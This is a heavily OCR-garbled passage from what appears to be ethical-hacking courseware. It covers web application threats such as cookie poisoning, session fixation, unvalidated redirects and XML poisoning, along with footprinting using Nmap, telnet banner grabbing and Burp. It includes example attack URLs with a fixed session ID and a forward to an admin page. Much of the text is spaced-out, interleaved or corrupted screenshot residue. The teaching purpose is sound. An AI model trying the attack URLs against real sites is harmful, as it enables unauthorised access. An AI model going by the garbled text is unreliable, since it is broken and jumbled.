in v o lv e t h e m o d i f i c a t i o n a t ta c k e r t o in je c t t h e r e w r i t i n g t h e s e s s io n d a t a ,
o f t h e c o n t e n t s o f a c o o k ie m a li c io u s c o n t e n t , m o d i f y d i s p la y i n g t h e c o o k i e d a t a ,
( p e r s o n a l in f o r m a t io n s to re d t h e u s e r 's o n l i n e a n d / o r s p e c ify in g a n e w u s e r
in a w e b u s e r 's c o m p u t e r ) in e x p e r ie n c e , a n d o b t a i n t h e ID o r o t h e r s e s s io n i d e n t i f i e r s
o r d e r t o b y p a s s s e c u r it y u n a u th o riz e d in fo r m a tio n in t h e c o o k i e
m e c h a n is m s A
C o o k ie /S e s s io n P o is o n in g
T h re a ts
A tta c k e r
H o w C o o k ie P o is o n in g W o r k s
C o o k ie s are m a in ly used by w e b a p p li c a t i o n s t o s im u la te a s t a t e f u l e x p e r ie n c e
d e p e n d in g u p o n th e end u ser. T h e y a re used as an i d e n t i t y f o r t h e s e r v e r side o f w e b
a p p li c a t i o n c o m p o n e n t s . T his a t t a c k a lt e r s t h e v a lu e o f a c o o k ie a t t h e c l i e n t s id e p r i o r t o t h e
r e q u e s t t o t h e s e rv e r. A w e b s e r v e r can se n d a s e t c o o k ie w i t h t h e h e lp o f a n y r e s p o n s e o v e r
t h e p r o v id e d s tr in g a n d c o m m a n d . T h e c o o k ie s a re s t o r e d o n t h e u s e r c o m p u t e r s a n d a re a
s t a n d a r d w a y o f r e c o g n iz in g users. All t h e r e q u e s ts o f t h e c o o k ie s h a v e b e e n s e n t t o t h e w e b
s e rv e r o n c e it has b e e n set. To p r o v id e f u r t h e r f u n c t i o n a l i t y t o t h e a p p li c a t i o n , c o o k ie s can be
m o d i f i e d a n d a n a ly z e d b y Ja vaS cript.
T h e f o l l o w i n g d ia g r a m c le a rly e x p la in s t h e p ro c e s s o f a c o o k ie p o is o n in g a tta c k :
Webserver
W e b s e rv e r re p lie s w ith re q u e s te d
p a g e a n d s e ts a c o o k ie o n th e u s e r's b r o w s e r
U s e r b ro w s e s a w e b pag e
A tta c k e r o r d e r s f o r p r o d u c t u s in g m o d ifie d c o o k ie
Attacker
F IG U R E 1 3 . 2 5 : H o w C o o k ie P o is o n i n g W o r k s
In a s e s s io n f ix a t io n a t ta c k , t h e
A t ta c k e r a s s u m e s t h e i d e n t i t y o f t h e
a t ta c k e r t r ic k s t h e u s e r t o acc e s s a
v ic t im a n d e x p lo it s h is c r e d e n t ia ls a t
g e n u in e w e b s e r v e r u s in g a n e x p lic it
th e s e rv e r
s e s s io n ID v a lu e
Attacker sends an
email containing a link
with a fix session ID h t t p : / / juggybank.dom/login. ja
p?sessionid=4321
User clicks o n th e lin k and is re d ire c te d t o th e bank w e b s ite •
U ser
It User logs in to th e s e rv e r using his c re d e n tia ls and fix e d session ID
S e s s io n F ix a tio n A tta c k s
T h e session f i x a t i o n a t t a c k p r o c e d u r e is e x p la in e d w i t h t h e h e lp o f t h e f o l l o w i n g d ia g r a m :
Attacker
A tta c k e r logs in to th e s e rv e r using th e v ic tim 's
c re d e n tia ls w ith th e sam e session ID
B
DO
User
FIGURE 1 3 .2 6 : H ow C o o k ie P o iso n in g W o rk s
I n s u f f i c i e n t T r a n s p o r t L a y e r
CEH
P r o t e c t io n
I n s u ff ic ie n t t r a n s p o r t la y e r p r o t e c tio n s u p p o r t s w e a k a lg o r ith m s , a n d
u s e s e x p ir e d o r in v a lid c e r t if ic a t e s
T h is v u ln e r a b ilit y e x p o s e s u s e r 's d a ta
t o u n t r u s t e d t h i r d p a r t ie s a n d c a n
le a d t o a c c o u n t t h e f t
In s u f fic ie n t T r a n s p o r t L a y e r P r o te c tio n
SSL/TLS a u t h e n t i c a t i o n s h o u ld be used f o r a u t h e n t i c a t i o n o n t h e w e b s i t e s o r t h e
a t t a c k e r can m o n i t o r n e t w o r k t r a f f i c t o s te a l an a u t h e n t i c a t e d u s e r's se ssio n c o o k ie .
I n s u f f i c ie n t t r a n s p o r t la y e r p r o t e c t i o n m a y a l l o w u n t r u s t e d t h i r d p a r t i e s t o o b t a i n u n a u t h o r i z e d
access t o s e n s itiv e i n f o r m a t i o n . T h e c o m m u n i c a t i o n b e t w e e n t h e w e b s i t e a n d t h e c l i e n t s h o u ld
be p r o p e r l y e n c r y p t e d o r d a ta can be i n t e r c e p t e d , i n je c te d , o r r e d ir e c t e d . V a r io u s t h r e a t s like
a c c o u n t t h e f t s , p h is h in g a tta c k s , a n d a d m in a c c o u n ts m a y h a p p e n a f t e r s y s te m s a re b e in g
c o m p ro m is e d .
J I m p r o p e r e r r o r h a n d l i n g g iv e s i n s i g h t i n t o s o u r c e c o d e s u c h a s lo g ic f l a w s ,
d e f a u lt a c c o u n ts , e tc .
U s in g t h e in f o r m a t i o n r e c e iv e d f r o m a n e r r o r m e s s a g e , a n a t t a c k e r
id e n t if ie s v u ln e r a b ilit ie s
In fo r m a tio n G a th e re d
httpy/j uggyboy.com/
lo o
e O u t o f m e m o ry
B o y .1
« N u ll p o in t e r e x c e p tio n s
G eneral Error
« S y s te m c a ll fa ilu re
Couldnotobtainpost/userInformation
® D a ta b a s e u n a v a ila b le DEBUGMODE
SQLErroc: 1016Can'topenfile:'nuke_bbposts_text.MYO'. (errno: 145)
© N e tw o r k t im e o u t SELECTu.username, u.userjd, u.user_posts, u.user_from,u.user_webs!te.
u.user_email, u.user_msnm,u.user_viewemail, u.user_rank, u.user_sig,
S D a ta b a s e in fo r m a tio n
u.user_sig_bbcode_uid, u.user_alowsmile, p.*, pt.post_text, ptpost_subject
pt.bbcode.uidFROMnuke_bbpostsp, nuke_usersu, nuke_bbposts_text ptWHERE
p.topicJd»1547 '׳ANDpt.postJd■p.postJdANDu.userjd=p.posterjdORDERBY
a W e b a p p lic a tio n lo g ic a l f lo w p.post.tlmeASCLIMIT0, IS
Line:43S
© A p p lic a tio n e n v ir o n m e n t File:/user/home/geeks/www/vonage/modules/Forums/viewtope.php
JJw Si Im p r o p e r E r r o r H a n d lin g
el I m p r o p e r e r r o r h a n d lin g m a y r e s u lt in v a r io u s t y p e s o f issues f o r a w e b s i t e e x c lu s iv e ly
r e la t e d t o s e c u r it y a s p e cts, e s p e c ia lly w h e n in t e r n a l e r r o r m e ssa g e s such as s ta c k tra c e s ,
d a ta b a s e d u m p s , a n d e r r o r c o d e s a re d is p la y e d t o t h e a tta c k e r . A n a t t a c k e r can g e t v a r io u s
d e ta ils r e la t e d t o t h e n e t w o r k v e r s io n , e tc. I m p r o p e r e r r o r h a n d l i n g g ive s in s ig h t i n t o s o u rc e
c o d e such as lo g ic fla w s , d e f a u l t a c c o u n ts , e tc. U sing t h e i n f o r m a t i o n r e c e iv e d f r o m an e r r o r
m ess a g e , an a t t a c k e r i d e n t i f i e s v u l n e r a b i l i t i e s f o r la u n c h in g a tta c k s .
© O ut of m em ory
e N ull p o i n t e r e x c e p tio n s
e S y s te m call fa i lu r e
e D a ta b a s e u n a v a ila b le
0 N e tw o rk tim e o u t
Q D a ta b a s e i n f o r m a t i o n
e W e b a p p li c a t i o n lo g ica l f l o w
I n s e c u r e C r y p t o g r a p h i c S t o r a g e C E H
!. j! In s e c u re C r y p to g r a p h ic S to ra g e
T h e in s e c u r e c r y p t o g r a p h ic s to r a g e m e n t i o n s t h e s ta te o f an a p p li c a t i o n w h e r e p o o r e n c r y p t i o n
c o d e is u sed f o r s e c u r e ly s t o r i n g d a ta in t h e d a ta b a s e . So t h e in s e c u r e d a ta can be e a sily h a c k e d
a n d m o d i f i e d by t h e a t t a c k e r t o g ain c o n f i d e n t i a l a n d s e n s i t i v e i n f o r m a t i o n such as c r e d i t ca rd
in fo rm a tio n , passw ords, SSNs, and o th e r a u th e n tic a tio n c re d e n tia ls w ith a p p ro p ria te
e n c r y p t i o n o r h a s h in g t o la u n c h i d e n t i t y t h e f t , c r e d i t c a rd f r a u d , o r o t h e r c rim e s . D e v e lo p e r s
can a v o id such a tta c k s b y u sin g p r o p e r a lg o r i t h m s t o e n c r y p t t h e s e n s itiv e d a ta .
T h e f o l l o w i n g p ic t o r ia l r e p r e s e n t a t i o n s h o w s t h e v u ln e r a b l e c o d e t h a t is p o o r l y e n c r y p t e d a nd
s e c u re c o d e t h a t is p r o p e r l y e n c r y p t e d u s in g a s e c u re c r y p t o g r a p h i c a l g o r i t h m .
F IG U R E 1 3 . 2 7 : I n s e c u r e C r y p t o g r a p h i c S t o r a g e
B r o k e n A u t h e n t ic a t io n a n d
CEH
S e s s io n M a n a g e m e n t
B A n a t t a c k e r u s e s v u l n e r a b i l i t i e s in t h e a u t h e n t i c a t i o n o r s e s s io n m a n a g e m e n t f u n c t i o n s s u c h
a s e x p o s e d a c c o u n t s , s e s s io n ID s , lo g o u t , p a s s w o r d m a n a g e m e n t , t i m e o u t s , r e m e m b e r m e ,
s e c r e t q u e s t i o n , a c c o u n t u p d a t e , a n d o t h e r s t o im p e r s o n a t e u s e r s
B r o k e n A u th e n tic a tio n a n d S e s s io n M a n a g e m e n t
A u t h e n t i c a t i o n a n d session m a n a g e m e n t in c lu d e s e v e r y a s p e c t o f u s e r a u t h e n t i c a t i o n
a n d m a n a g in g a c tiv e sessions. Y e t t i m e s s o lid a u t h e n t i c a t i o n s also fa il d u e t o w e a k c r e d e n t i a l
f u n c t i o n s like p a s s w o r d c h a n g e , f o r g o t m y p a s s w o r d , r e m e m b e r m y p a s s w o r d , a c c o u n t u p d a te ,
e tc. U t m o s t c a re has t o be ta k e n r e la t e d t o u s e r a u t h e n t i c a t i o n . It is a lw a y s b e t t e r t o use s t r o n g
a u t h e n t i c a t i o n m e t h o d s t h r o u g h sp ecial s o f t w a r e - a n d h a r d w a r e - b a s e d c r y p t o g r a p h ic t o k e n s
o r b io m e t r i c s . A n a t t a c k e r uses v u ln e r a b i l it ie s in t h e a u t h e n t i c a t i o n o r se ssio n m a n a g e m e n t
f u n c t i o n s such as e x p o s e d a c c o u n ts , session IDs, lo g o u t, p a s s w o r d m a n a g e m e n t , t i m e o u t s ,
r e m e m b e r m e , s e c r e t q u e s t i o n , a c c o u n t u p d a t e , a nd o t h e r s t o i m p e r s o n a t e users.
S e s s io n I D in U R L s
E x a m p le :
h t t p : / / i u g g v s h o p . c o m /s a le /s a le ite m s = 3 0 4 ;is e s s io n id = 1 2 0 M T O ID P X M O O Q S A B G C K L H C J U N 2 J V ? d
e s t= N e w M e x ic o
T im e o u t E x p lo ita tio n
If an a p p li c a t i o n 's t i m e o u t s a re n o t s e t p r o p e r l y a n d a u s e r s i m p l y closes t h e b r o w s e r
— w i t h o u t lo g g in g o u t f r o m sites a ccessed t h r o u g h a p u b lic c o m p u t e r , t h e a t t a c k e r can
use t h e s a m e b r o w s e r la t e r a n d e x p l o i t t h e u s e r's p r iv ile g e s .
U n v a lid a t e d R e d ir e c t s a n d
CEH
F o r w a r d s Urt1fw4 ilh iu l lUtbM
J U n v a lid a t e d r e d ir e c t s e n a b le a t ta c k e r s t o in s t a l l m a lw a r e o r t r i c k v ic t im s in t o d is c lo s in g
p a s s w o r d s o r o t h e r s e n s itiv e in f o r m a t io n , w h e r e a s u n s a fe f o r w a r d s m a y a llo w a c c e s s
c o n tro l b y p a s s
Unvalidated Redirect
Unvalidated Forward
lo o hnpj׳/www,ju|C*ykhopxom/*dm1r^p
A d m in is tra tio n Page
A ttack e r re qu ests page
I t Create price list
from serv e r w ith a forw ard ^
Q Create ite m listing
http://www.juggyshop.com/purch A tta ck e r is forw a rde d
*1 Purchase records
-*■־־-־---*-. ase.jsp?fwd=admin.jsp
B6_____ י to ad m in page
£ 3 Registered users
A t ta c k e r S e rv e r
^ U n v a lid a te d R e d ire c ts a n d F o rw a rd s
U n s a fe f o r w a r d s m a y a l l o w access c o n t r o l b yp a ss le a d in g to :
Q Session F ix a tio n A t ta c k s
0 S e c u r ity M a n a g e m e n t E xp lo its
U nvalidated R edirect
U n v a lid a t e d F o rw a rd
Administration Page
A tta c k e r requests page
£ Create price list
fro m server w ith a fo rw a rd
Q Create item listing
h ttp ://w w w .juggyshop.com/purch A tta c k e r is fo rw a rd e d
ase.jsp?fwd=admin.jsp t o adm in page *1 Purchase records
3 Registered users
Attacker Server
F IG U R E 1 3 . 2 8 : U n v a l i d a t e d R e d ir e c t s a n d F o r w a r d s
.N e t TCP Channel,
Fast InfoS et, etc.
W e b S e r v ic e s A r c h ite c tu r e
* T O
WS־W o rk Processes
W S-Federation W S-SecureConversion
WS־Policy
WS W S-Trust
Security
SAML Kerberos X.509
XML E ncryption
Policy
Security Token Profiles :1
XML D igital Signatures
0 Web services evolution and its increasing use in business offers new attack vectors in an application 0
framework
Web services are based on XML protocols such as Web Services Definition Language (WSDL) for describing
the connection points; Universal Description, Discovery, and Integration (UDDI) forthe description and
discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web
^ 4 ^ 1־ ^ e b S e r v ic e s A tta c k
© A n a t t a c k e r is u s in g a w e b se rv ic e f o r o r d e r i n g p r o d u c t s , a n d in je c ts a s c r ip t t o re s e t
q u a n t i t y a n d s ta tu s o n t h e c o n f i r m a t i o n p ag e t o less t h a n w h a t w a s o r i g i n a l l y o r d e r e d .
In t h is w a y , t h e s y s te m p ro c e s s in g t h e o r d e r r e q u e s t s u b m it s t h e o r d e r , sh ip s t h e o r d e r ,
a n d t h e n m o d if ie s t h e o r d e r t o s h o w t h a t a s m a l l e r n u m b e r o f p r o d u c t s a re b e in g
s h ip p e d . T h e a t t a c k e r w i n d s u p r e c e iv in g m o r e o f t h e p r o d u c t t h a n he o r sh e pays f o r .
W e b S e r v ic e s F o o t p r in t in g A t t a c k C E H
C«rt1fW
4 itfciul NmIm
X M L Q u e ry X M L R e s p o n s e
^ W e b S e r v ic e s F o o tp r in tin g A tta c k
Q Business E n tity
Q Business S ervice
© B in d in g T e m p le
e T e c h n ic a l M o d e l ( t m o d e l )
X M L Q u e r y X M L R e s p o n s e
F IG U R E 1 3 . 3 0 : W e b S e r v ic e s F o o t p r i n t i n g A t t a c k
W e b S e r v ic e s X M L P o is o n in g CEH
Attackers insert malicious XML codes in SOAP requests to perform XML node manipulation or XML schema
poisoning in order to generate errors in XML parsing logic and break execution logic
Attackers can manipulate XML external entity references that can lead to arbitrary file or TCP connection
openings and can be exploited for other web service attacks
XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information
XM L R equest P o is o n e d X M L R e q u e s t
<CustomerRecord>
<CustomerRecord>
<C ustom erN um ber>2010</C ustom erN um ber>
<C ustom erN um ber>2010</C ustom erN um ber>
<FirstNam e>Jason</FirstNam e><Custom erNum ber>
<FirstName>Jason</FirstName>
2010</C ustom erN um ber>
<LastN am e>Springfield</LastN am e>
<FirstName>Jason</FirstNam e>
<Address>Apt 20, 3rd S treet</A ddress>
<LastN am e>Springfield</LastN am e>
<Em ail>jason@ springfield.com </Em ail>
<Address>Apt 20, 3rd Street</A ddress>
<P honeN um ber>6325896325</P honeN um ber>
<Email>jason (®springfield.com </E m ail>
</Custom erRecord>
<P honeN um ber>6325896325</P honeN um ber>
</Custom erRecord>
W e b S e r v ic e s X M L P o is o n in g
A t t a c k e r s i n s e r t m a lic io u s X M L c o d e s in SOAP r e q u e s ts t o p e r f o r m X M L n o d e m a n i p u l a t i o n o r
X M L s c h e m a p o is o n in g in o r d e r t o g e n e r a t e e r r o r s in X M L p a rs in g log ic a nd b r e a k e x e c u t io n
logic. A t t a c k e r s can m a n i p u l a t e X M L e x t e r n a l e n t i t y r e f e r e n c e s t h a t can lead t o a r b i t r a r y file o r
TCP c o n n e c t i o n o p e n in g s a n d can be e x p l o i t e d f o r o t h e r w e b se rv ic e a tta c k s . X M L p o is o n in g
e n a b le s a t ta c k e r s t o ca use a d e n ia l- o f- s e r v ic e a t t a c k a n d c o m p r o m i s e c o n f i d e n t i a l i n f o r m a t i o n .
F IG U R E 1 3 . 3 1 : W e b S e r v ic e s X M L P o is o n i n g
H a c k in g M e t h o d o l o g y
m m
W e b A p p l i c a t i o n H a c k in g T oo ls
^־־ M o d u le F lo w
So fa r, w e h a v e d iscu ss e d w e b a p p li c a t i o n c o m p o n e n t s a n d v a r io u s t h r e a t s a s s o c ia te d
w i t h w e b a p p lic a tio n s . N o w w e w i ll discuss w e b a p p li c a t i o n h a c k in g m e t h o d o l o g y . A h a c k in g
m e t h o d o l o g y is a w a y t o c h e c k e v e r y p o s s ib le w a y t o c o m p r o m i s e t h e w e b a p p li c a t i o n by
a t t e m p t i n g t o e x p l o i t all p o t e n t i a l v u l n e r a b i l it ie s p r e s e n t in it.
^ W e b A p p Pen T e s t in g W e b A p p C o n c e p ts
S e c u r i t y T o o ls W e b A p p T h re a ts
W e b A p p l i c a t i o n H a c k in g T o o ls
# n ^ W e b A p p H a c k in g M e th o d o lo g y
< סn >
In o r d e r t o h a c k a w e b a p p li c a t i o n , t h e a t t a c k e r in i t i a ll y tr i e s t o g a t h e r as m u c h
i n f o r m a t i o n as p o s s ib le a b o u t t h e w e b i n f r a s t r u c t u r e . F o o t p r i n t i n g is o n e m e t h o d u sin g w h i c h
an a t t a c k e r can g a t h e r v a lu a b le i n f o r m a t i o n a b o u t t h e w e b i n f r a s t r u c t u r e o r w e b a p p li c a t i o n .
J W e b i n f r a s t r u c t u r e f o o t p r i n t i n g i s t h e f i r s t s t e p in w e b a p p l i c a t i o n h a c k i n g ; i t h e l p s a t t a c k e r s t o
s e le c t v ic t im s a n d id e n t if y v u ln e r a b le w e b a p p lic a t io n s
Hidden
Content Discovery
Server Discovery E x tr a c t c o n t e n t a n d
f u n c t i o n a l it y t h a t is n o t
D is c o v e r t h e p h y s ic a l
d i r e c t ly lin k e d o r r e a c h a b le
s e r v e r s t h a t h o s ts
f r o m t h e m a in v is ib le c o n t e n t
w e b a p p lic a tio n Server Identification
G ra b s e r v e r b a n n e r s t o
id e n t if y t h e m a k e a n d
Service Discovery v e r s io n o f t h e w e b
s e rv e r s o ftw a re
D is c o v e r t h e s e r v ic e s r u n n in g o n w e b
s e r v e r s t h a t c a n b e e x p lo it e d as
a t ta c k p a th s f o r w e b a p p h a c k in g
F o o tp r in t W e b In fr a s tr u c tu r e
W e b i n f r a s t r u c t u r e f o o t p r i n t i n g is t h e f i r s t s te p in w e b a p p li c a t i o n h a c k in g ; it h e lp s
a t ta c k e r s to s e le c t v ic tim s and id e n tify v u ln e ra b le web a p p lic a tio n s . Through web
i n f r a s t r u c t u r e f o o t p r i n t i n g , an a t t a c k e r can p e r f o r m :
S e rv e r D is c o v e ry
י
In s e r v e r d is c o v e r y , w h e n t h e r e is an a t t e m p t i n g t o c o n n e c t t o a s e rv e r, t h e r e d i r e c t o r
m a k e s an i n c o r r e c t a s s u m p t i o n t h a t t h e r o o t o f t h e URL n a m e s p a c e w i ll be W e b D A V -
a w a r e . It d is c o v e r s t h e p h ysica l s e rv e rs t h a t h o s t w e b a p p lic a t io n .
S e r v ic e D is c o v e r y
S e rv e r Id e n tific a tio n
G ra b t h e s e r v e r b a n n e r s t o i d e n t i f y t h e m a k e a n d v e r s io n o f t h e w e b s e r v e r s o f t w a r e .
It c o n s is ts o f:
W f H id d e n C o n te n t D is c o v e ry
F o o t p r in t W e b I n f r a s t r u c t u r e :
S e r v e r D is c o v e r y
■ S e r v e r d is c o v e r y g iv e s in f o r m a t i o n a b o u t t h e l o c a t i o n o f s e r v e r s a n d e n s u r e s t h a t t h e t a r g e t
s e r v e r is a l i v e o n I n t e r n e t
W h o is L o o k u p T ools:
P ort Scanning a tte m p ts t o conn ect t o a p a rtic u la r set o f TCP o r UDP p o rts t o fin d o u t
th e service th a t exists on th e s e rv e r
P o rt Scanning Tools:
9 N m ap 0 W hatsU p P ortScannerTool
1 8 NetScan Tools Pro 6 Hping
F o o tp r in t W e b In fr a s tr u c tu r e : S e rv e r D is c o v e r y
In o r d e r t o f o o t p r i n t a w e b i n f r a s t r u c t u r e , f i r s t y o u n e e d t o d is c o v e r t h e a c t iv e s e r v e r s
o n t h e i n t e r n e t . S e r v e r d is c o v e r y g ive s i n f o r m a t i o n a b o u t t h e lo c a t i o n o f a c tiv e s e rv e rs o n t h e
I n t e r n e t . T h e t h r e e te c h n i q u e s , n a m e l y w h o i s l o o k u p , DNS i n t e r r o g a t i o n , a n d p o r t s c a n n in g ,
h e lp in d is c o v e r in g t h e a c tiv e s e rv e rs a n d t h e i r a s s o c ia te d i n f o r m a t i o n .
W h o is L o o k u p
f 3):
W h o is L o o k u p is a t o o l t h a t a llo w s y o u t o g a t h e r i n f o r m a t i o n a b o u t a d o m a i n w i t h th e
h e lp o f DNS a n d W H O IS q u e r ie s . T his p r o d u c e s t h e r e s u lt in t h e f o r m o f a H T M L
r e p o r t . It is a u t i l i t y t h a t gives i n f o r m a t i o n a b o u t t h e IP a d d re s s o f t h e w e b s e r v e r a n d DNS
n a m e s . S o m e o f t h e W h o is L o o k u p T o o ls are:
e h ttp ://w w w .w h o is .n e t
D N S In te r r o g a tio n
o DNS i n t e r r o g a t i o n is a d i s t r i b u t e d d a ta b a s e t h a t is used by v a r ie d o r g a n i z a t i o n s t o
© h ttp ://e -d n s .o rg
© h ttp ://w w w .d o m a in to o ls .c o m
m m ■ P o rt S c a n n in g
B U I P o r t s c a n n in g is a p ro c e s s o f s c a n n in g t h e s y s te m p o r ts t o re c o g n iz e t h e o p e n d o o rs . If
a n y u n u s e d o p e n p o r t is r e c o g n iz e d by an a tta c k e r , t h e n he o r sh e can i n t r u d e i n t o
t h e s y s te m b y e x p l o i t i n g it. T his m e t h o d a t t e m p t s t o c o n n e c t t o a p a r t i c u l a r s e t o f TCP o r UDP
p o r t s t o f i n d o u t t h e s e rv ic e t h a t e xists o n t h e s e rv e r. S o m e o f t h e t o o l s a re :
© Nmap
© N e tS ca n T o o ls Pro
© W h a t s U p P o r ts c a n n e r T o o l
© H p in g
F o o t p r in t W e b I n f r a s t r u c t u r e :
S e r v ic e D is c o v e r y
F o o tp r in t W e b In fr a s tr u c tu r e : S e r v ic e D is c o v e r y
P ort T y p ic a l HTTP S e rv ic e s
80 W o r l d W i d e W e b s ta n d a r d p o r t
81 A lte rn a te W W W
88 K e r b e ro s
443 SSL ( h tt p s )
900 IB M W e b s p h e r e a d m i n i s t r a t i o n c l i e n t
2301 C o m p a q Insight M a n a g e r
2381 C o m p a q In s ig h t M a n a g e r o v e r SSL
7001 BEA W e b lo g i c
8000 A l t e r n a t e W e b s e rv e r, o r W e b ca c he
10000 N e ts c a p e A d m i n i s t r a t o r i n t e r f a c e
T A B L E 1 3 . 1 : S e r v ic e D i s c o v e r y
S o u rc e : h t t p : / / n m a p . o r g
N m a p is a s c a n n e r t h a t is used t o f i n d i n f o r m a t i o n a b o u t s y s te m s a n d se rv ic e s o n a n e t w o r k and
t o c o n s t r u c t a m a p o f t h e n e t w o r k . It can also d e f i n e d i f f e r e n t s e rvice s r u n n i n g o n t h e w e b
s e r v e r a n d g ive d e t a i le d i n f o r m a t i o n a b o u t t h e r e m o t e c o m p u t e r s .
Zenmap L=±hJ
Scan Tools Profile Help
OS < Host
< Port * Protocol * State < Service * Version
# SO tcp open http
.9 google.com (74.12
# 113 tcp closed ident
־C A 443 tcp open https
Filter Hosts
F IG U R E 1 3 . 3 2 : Z e n m a p T o o l s c r e e n s h o t
F o o tp rin t W e b In fr a s tr u c tu r e : S e rv e r
Id e n tific a tio n /B a n n e r G r a b b in g
CEH
Urt1fw4 ilhiul lUtbM
A n a ly z e t h e s e r v e r r e s p o n s e h e a d e r f i e l d t o i d e n t i f y t h e m a k e , m o d e l , a n d v e r s io n
o f th e w e b s e rv e r s o ftw a r e
T h is in f o r m a t io n h e lp s a t ta c k e r s t o s e le c t t h e e x p lo it s f r o m v u l n e r a b il it y d a ta b a s e s t o
a t ta c k a w e b s e r v e r a n d a p p lic a tio n s
B a n n e r g r a b b in g t o o ls :
1. T e ln e t 2. N e tc a t 3 . ID S e rv e 4. N e tc ra ft
H
׳ ■, F o o tp r in t W e b In fr a s tr u c tu r e : S e rv e r
Id e n tific a tio n /B a n n e r G r a b b in g
T h r o u g h b a n n e r g ra b b in g , an a t t a c k e r id e n t if ie s b r a n d a n d / o r v e r s io n o f a s e rv e r, an o p e r a t i n g
s y s te m , o r an a p p li c a t i o n . A t t a c k e r s a n a ly z e t h e s e r v e r r e s p o n s e h e a d e r f ie ld t o i d e n t i f y t h e
m a k e , m o d e l , a n d v e r s io n o f t h e w e b s e r v e r s o f t w a r e . T his i n f o r m a t i o n h e lp s a tt a c k e r s t o
s e le c t t h e e x p lo it s f r o m v u l n e r a b i l i t y d a ta b a s e s t o a t t a c k a w e b s e r v e r a n d a p p lic a tio n s .
C : \ t e l n e t w w w .ju g g y b o y .c o m 80 HEAD / H T T P /1 .0
© T e ln e t
Q N etcat
e ID Serve
© N e tc ra ft
Connection to host lo s t .
C:\>
ם:
F IG U R E 1 3 . 3 3 : S e r v e r I d e n t i f i c a t i o n / B a n n e r G r a b b in g
F o o tp rin t W e b In fr a s tr u c tu r e : H id d e n
C o n te n t D is c o v e r y
CEH
J D is c o v e r t h e h id d e n c o n t e n t a n d f u n c t i o n a l it y t h a t is n o t r e a c h a b le f r o m t h e m a in
v is ib le c o n t e n t t o e x p l o it u s e r p r iv ile g e s w it h in t h e a p p lic a tio n
Attacker-Directed
Spidering
F o o tp r in t W e b In fr a s tr u c tu r e : H id d e n C o n te n t
D is c o v e r y
W e b S p id e rin g
W e b s p id e r s a u t o m a t i c a l l y d is c o v e r h id d e n c o n t e n t a n d f u n c t i o n a l i t y b y p a rs in g H T M L
f o r m s a n d c l i e n t- s id e Ja v a S c rip t r e q u e s ts a n d re sp o n s e s .
T o o ls t h a t can be u sed t o d is c o v e r t h e h id d e n c o n t e n t b y m e a n s o f w e b s p id e r i n g in c lu d e :
Q O W A S P Zed A t t a c k P ro xy
Q B u r p S p id e r
© W ebS cara b
A tta c k e r - D ir e c te d S p id e rin g
B ru te F o rc in g
W e b S p id e r in g U s in g B u r p S u ite C E H
C«rt1fW
4 itfciul NmIm
Ic’cvpt: »/ *
1
AppleVebK1c/S39.^ iKITOJL, Like Cecko)
-h ro n e , ב ג. u . 1 :: 9 .3 a S a ta r /6 3 7 .4
1 lM t ־lg * n e : K o x ilW S .O (Window■* NT C. 2 ; V0V£«) A p p l« 0 » b X lt/3 3 7 . «
{KBTHL, like Oeeko) Chrowe/22.0. i229.9־l Srttor 1 /S 3 7 . 1
R»Z«x«x: Accept: י/•
6
6 SCICD3 ASD2 EABE0 351PE0S7SD 12 S54tP ORN-1OPRBA
\c~*l
h t t p : / / * » w . b in g . c ocV anwwj-.י־/ it o c c M q-b i id-«CCC7£'70 Mttrtn
h t t p : / / v ׳rf־r f.M n g .c o » / U » *y « s/i«a 1:ch? q-blk*i11 id« ־CCC7«70<SClCPJA9P:SA,SS9<J
A c c e pt-E nco ding : g z 1 p , d e lla te , 9dcH 5ir1C575D1:594*POPH-rcrRBA
Accvpt-Zncodisvg: cjzip , d * f lu te , aclch
| 0 matches A cce pt-lan gu a{re: en-US, en: g8 .0 ־
ic ce p c-cn a trse c: JSO -88S S-l,uc£-8;«r=0.7, '; q * 0 .3
W e b S p id e rin g U s in g B u r p S u ite
^ ^ S o u rc e : h t t p : / / w w w . p o r t s w i R g e r . n e t
W e b s p id e r e in g u sin g B u rp S u ite is d o n e in t h e f o l l o w i n g m a n n e r :
3. B r o w s e t h e t a r g e t a p p li c a t i o n w i t h J a v a S c r ip t e n a b le d a n d d is a b le d , a n d w i t h c o o k ie s
e n a b le d a n d d is a b le d
4. C he ck t h e s ite m a p g e n e r a t e d b y t h e B u rp p ro x y , a n d i d e n t i f y a n y h id d e n a p p li c a t i o n
c o n t e n t o r f u n c t io n s
5. C o n t in u e th e s e ste p s r e c u r s iv e ly u n t i l n o f u r t h e r c o n t e n t o r f u n c t i o n a l i t y is i d e n t if ie d
J 0 matches
intruder attack 1
attack save columns
request [ response
F IG U R E 1 3 . 3 4 : S e r v e r I d e n t i f i c a t i o n / B a n n e r G r a b b in g
W e b S p id e r in g U s in g M o z e n d a
W e b A g e n t B u ild e r
CEH
J M ozenda W eb A gent
B u ild e r c r a w ls t h r o u g h
a w e b s it e a n d h a rv e s ts
p a g e s o f in fo r m a tio n
W e b S p id e rin g U s in g M o z e n d a W e b A g e n t B u ild e r
S o u rc e : h t t p : / / w w w . m o z e n d a . c o m
New Action
Use the tools below to peifoint actions on tlie oauc
Share 1 8 יPi0d « t
r
Cick an item Writ* o Rovtew
O f Capture text or image
Choose son order Date: Newest
ט Set user input
Whet's greet about i t WAS VERY EASYTC SET UP, REMOTE EASYTO USE FOR FEATURES
*GREAT =>CTl.RE AMD FEATJRES VERY USER FREMDLY. EASY TO SET UP־
Would you recommend this product to a friend?! yes ^
Use the tools above to add a new action to this page
modify the behavior of th e currently selected action
0 Was T tt r»/ew reep־U? res Ho Repor nappr33na:e review
Siere J-isF.oBft.
Page L
Begin Rem List •Item Namelist
Customer Retina & & & & '. U
Capture Item Name
Capture Rice fu rry P ic tjre C'/IWO'C
c a p tu re . Rating
Capture • Model
Click Item
End Uit
ReviewRating Review Wouldrecommend
EZ^H What*־greatabout it WASVERVEAS. Yet
3.0 Wttifsgreatabout it. GreatSoundWh... No
Begin Item list • Review Ratingl...
Capture • Review Rating
d.o Whet'sgreetabout it: nicefeatuiesW... Yes
Capture Review
AJ) What'sgreataoout it goodprice, loo... Yet
Capture Would recommend
v[2J/e 2]» ]ד/ d r v [ 4 ) / d i r l 1 • l1 נ/ toadynjytr[!]/
F IG U R E 1 3 . 3 5 : W e b S p id e r in g U s in g M o z e n d a W e b A g e n t B u i l d e r
W e b A p p H a c k in g M e th o d o lo g y
A tta c k W e b S e rv e rs
H a c k in g W e b s e rv e rs
